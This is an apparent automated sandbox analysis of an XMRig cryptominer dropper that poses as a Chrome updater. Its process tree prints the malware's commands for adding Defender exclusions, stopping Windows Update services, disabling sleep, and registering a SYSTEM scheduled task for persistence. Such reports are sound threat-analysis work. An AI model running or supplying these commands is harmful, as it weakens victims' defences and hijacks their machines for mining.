Analysis

  • max time kernel
    150s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-07-2023 01:20

General

  • Target

    f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830.exe

  • Size

    5.6MB

  • MD5

    56270856311af456a2d0216129d8daf5

  • SHA1

    c0fff6d6a9fda4b7086422efa1e4b1fa3e3258c6

  • SHA256

    f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830

  • SHA512

    85d54f7d60203adad5e229a1c5a8abff92bd1a27fcf823933aa5a8d8b4d4c28d36285a0f09d1874a4fab27330ca9394c0cdc1140c8ebe398dbc47b34555d1f86

  • SSDEEP

    98304:PyPCWkFm5sbtLInk76Wbe02hQsvPDVXl5nJWt+1iYD8QR6nPQ6E3CzhSmHoaxsmS:PiCpm5uINjPDVXDnJ9ik82qPQNEhSmHG

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 11 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Stops running service(s) 3 TTPs
  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3160
      • C:\Users\Admin\AppData\Local\Temp\f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830.exe
        "C:\Users\Admin\AppData\Local\Temp\f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:3664
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1512
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3516
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:800
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:524
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:2140
        • C:\Windows\System32\sc.exe
          sc stop bits
          3⤵
          • Launches sc.exe
          PID:3924
        • C:\Windows\System32\sc.exe
          sc stop dosvc
          3⤵
          • Launches sc.exe
          PID:4560
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2096
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4184
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1420
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:784
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4216
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hnwthdb#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:564
      • C:\Windows\System32\schtasks.exe
        C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
        2⤵
          PID:392
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:2148
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2256
          • C:\Windows\System32\sc.exe
            sc stop UsoSvc
            3⤵
            • Launches sc.exe
            PID:3760
          • C:\Windows\System32\sc.exe
            sc stop WaaSMedicSvc
            3⤵
            • Launches sc.exe
            PID:4588
          • C:\Windows\System32\sc.exe
            sc stop wuauserv
            3⤵
            • Launches sc.exe
            PID:2812
          • C:\Windows\System32\sc.exe
            sc stop bits
            3⤵
            • Launches sc.exe
            PID:3796
          • C:\Windows\System32\sc.exe
            sc stop dosvc
            3⤵
            • Launches sc.exe
            PID:3428
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3312
          • C:\Windows\System32\powercfg.exe
            powercfg /x -hibernate-timeout-ac 0
            3⤵
              PID:3036
            • C:\Windows\System32\powercfg.exe
              powercfg /x -hibernate-timeout-dc 0
              3⤵
                PID:4032
              • C:\Windows\System32\powercfg.exe
                powercfg /x -standby-timeout-ac 0
                3⤵
                  PID:1896
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -standby-timeout-dc 0
                  3⤵
                    PID:1636
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hnwthdb#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                  2⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4620
                • C:\Windows\System32\conhost.exe
                  C:\Windows\System32\conhost.exe
                  2⤵
                    PID:4116
                  • C:\Windows\explorer.exe
                    C:\Windows\explorer.exe
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3780
                • C:\Program Files\Google\Chrome\updater.exe
                  "C:\Program Files\Google\Chrome\updater.exe"
                  1⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Drops file in Drivers directory
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Drops file in Program Files directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:2844

                Network

                MITRE ATT&CK Enterprise v6

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Program Files\Google\Chrome\updater.exe

                  Filesize

                  5.6MB

                  MD5

                  56270856311af456a2d0216129d8daf5

                  SHA1

                  c0fff6d6a9fda4b7086422efa1e4b1fa3e3258c6

                  SHA256

                  f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830

                  SHA512

                  85d54f7d60203adad5e229a1c5a8abff92bd1a27fcf823933aa5a8d8b4d4c28d36285a0f09d1874a4fab27330ca9394c0cdc1140c8ebe398dbc47b34555d1f86

                • C:\Program Files\Google\Chrome\updater.exe

                  Filesize

                  5.6MB

                  MD5

                  56270856311af456a2d0216129d8daf5

                  SHA1

                  c0fff6d6a9fda4b7086422efa1e4b1fa3e3258c6

                  SHA256

                  f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830

                  SHA512

                  85d54f7d60203adad5e229a1c5a8abff92bd1a27fcf823933aa5a8d8b4d4c28d36285a0f09d1874a4fab27330ca9394c0cdc1140c8ebe398dbc47b34555d1f86

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                  Filesize

                  2KB

                  MD5

                  d85ba6ff808d9e5444a4b369f5bc2730

                  SHA1

                  31aa9d96590fff6981b315e0b391b575e4c0804a

                  SHA256

                  84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                  SHA512

                  8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  944B

                  MD5

                  cb3a799921d48256ab45414af88b0aa8

                  SHA1

                  8888fb5656f5f11576c0fbc3ba45d7df56000d28

                  SHA256

                  5ad60a0e324106c6b5a8a7c41b4eac83234ed53cf26025dd4d63c0750b265105

                  SHA512

                  21b53b49d0f95cb600444b15a274c31d9374ae96dc2ab464e6ada96bae11f1000e92f6f51f62e5b91891dbbb30e6ab9c71006a9a166b8d4ae24457dcd7efdf69

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a0mue4aw.k2d.ps1

                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                • C:\Windows\System32\drivers\etc\hosts

                  Filesize

                  3KB

                  MD5

                  00930b40cba79465b7a38ed0449d1449

                  SHA1

                  4b25a89ee28b20ba162f23772ddaf017669092a5

                  SHA256

                  eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01

                  SHA512

                  cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                  Filesize

                  4KB

                  MD5

                  bdb25c22d14ec917e30faf353826c5de

                  SHA1

                  6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

                  SHA256

                  e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

                  SHA512

                  b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  b42c70c1dbf0d1d477ec86902db9e986

                  SHA1

                  1d1c0a670748b3d10bee8272e5d67a4fabefd31f

                  SHA256

                  8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

                  SHA512

                  57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

                • memory/564-162-0x000002356C890000-0x000002356C8A0000-memory.dmp

                  Filesize

                  64KB

                • memory/564-161-0x000002356C890000-0x000002356C8A0000-memory.dmp

                  Filesize

                  64KB

                • memory/564-163-0x000002356C890000-0x000002356C8A0000-memory.dmp

                  Filesize

                  64KB

                • memory/1512-146-0x000001EB5CE10000-0x000001EB5CE20000-memory.dmp

                  Filesize

                  64KB

                • memory/1512-145-0x000001EB5CE10000-0x000001EB5CE20000-memory.dmp

                  Filesize

                  64KB

                • memory/1512-144-0x000001EB5CE10000-0x000001EB5CE20000-memory.dmp

                  Filesize

                  64KB

                • memory/1512-139-0x000001EB447D0000-0x000001EB447F2000-memory.dmp

                  Filesize

                  136KB

                • memory/2148-174-0x0000023A73990000-0x0000023A739A0000-memory.dmp

                  Filesize

                  64KB

                • memory/2148-189-0x0000023A73D40000-0x0000023A73D5C000-memory.dmp

                  Filesize

                  112KB

                • memory/2148-190-0x0000023A73990000-0x0000023A739A0000-memory.dmp

                  Filesize

                  64KB

                • memory/2148-191-0x0000023A73E20000-0x0000023A73E2A000-memory.dmp

                  Filesize

                  40KB

                • memory/2148-192-0x0000023A73F90000-0x0000023A73FAC000-memory.dmp

                  Filesize

                  112KB

                • memory/2148-193-0x0000023A73F70000-0x0000023A73F7A000-memory.dmp

                  Filesize

                  40KB

                • memory/2148-194-0x0000023A73FD0000-0x0000023A73FEA000-memory.dmp

                  Filesize

                  104KB

                • memory/2148-195-0x0000023A73F80000-0x0000023A73F88000-memory.dmp

                  Filesize

                  32KB

                • memory/2148-196-0x0000023A73FB0000-0x0000023A73FB6000-memory.dmp

                  Filesize

                  24KB

                • memory/2148-197-0x0000023A73FC0000-0x0000023A73FCA000-memory.dmp

                  Filesize

                  40KB

                • memory/2148-179-0x0000023A73990000-0x0000023A739A0000-memory.dmp

                  Filesize

                  64KB

                • memory/2844-233-0x00007FF7F22B0000-0x00007FF7F2851000-memory.dmp

                  Filesize

                  5.6MB

                • memory/2844-168-0x00007FF7F22B0000-0x00007FF7F2851000-memory.dmp

                  Filesize

                  5.6MB

                • memory/2844-213-0x00007FF7F22B0000-0x00007FF7F2851000-memory.dmp

                  Filesize

                  5.6MB

                • memory/3664-166-0x00007FF6CC1B0000-0x00007FF6CC751000-memory.dmp

                  Filesize

                  5.6MB

                • memory/3664-133-0x00007FF6CC1B0000-0x00007FF6CC751000-memory.dmp

                  Filesize

                  5.6MB

                • memory/3780-241-0x00007FF78A620000-0x00007FF78AE0F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/3780-259-0x00007FF78A620000-0x00007FF78AE0F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/3780-239-0x0000000012400000-0x0000000012420000-memory.dmp

                  Filesize

                  128KB

                • memory/3780-257-0x00007FF78A620000-0x00007FF78AE0F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/3780-255-0x00007FF78A620000-0x00007FF78AE0F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/3780-234-0x0000000000E00000-0x0000000000E20000-memory.dmp

                  Filesize

                  128KB

                • memory/3780-235-0x0000000001CA0000-0x0000000001CE0000-memory.dmp

                  Filesize

                  256KB

                • memory/3780-253-0x00007FF78A620000-0x00007FF78AE0F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/3780-237-0x00007FF78A620000-0x00007FF78AE0F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/3780-242-0x0000000001DE0000-0x0000000001E00000-memory.dmp

                  Filesize

                  128KB

                • memory/3780-251-0x00007FF78A620000-0x00007FF78AE0F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/3780-249-0x00007FF78A620000-0x00007FF78AE0F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/3780-238-0x0000000001DE0000-0x0000000001E00000-memory.dmp

                  Filesize

                  128KB

                • memory/3780-243-0x0000000012400000-0x0000000012420000-memory.dmp

                  Filesize

                  128KB

                • memory/3780-245-0x00007FF78A620000-0x00007FF78AE0F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/3780-247-0x00007FF78A620000-0x00007FF78AE0F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/4116-246-0x00007FF62C350000-0x00007FF62C37A000-memory.dmp

                  Filesize

                  168KB

                • memory/4116-236-0x00007FF62C350000-0x00007FF62C37A000-memory.dmp

                  Filesize

                  168KB

                • memory/4620-226-0x00007FF47F270000-0x00007FF47F280000-memory.dmp

                  Filesize

                  64KB

                • memory/4620-228-0x000001FCA9FB9000-0x000001FCA9FBF000-memory.dmp

                  Filesize

                  24KB

                • memory/4620-214-0x000001FCA9FB0000-0x000001FCA9FC0000-memory.dmp

                  Filesize

                  64KB

                • memory/4620-215-0x000001FCA9FB0000-0x000001FCA9FC0000-memory.dmp

                  Filesize

                  64KB

                • memory/4620-216-0x000001FCA9FB0000-0x000001FCA9FC0000-memory.dmp

                  Filesize

                  64KB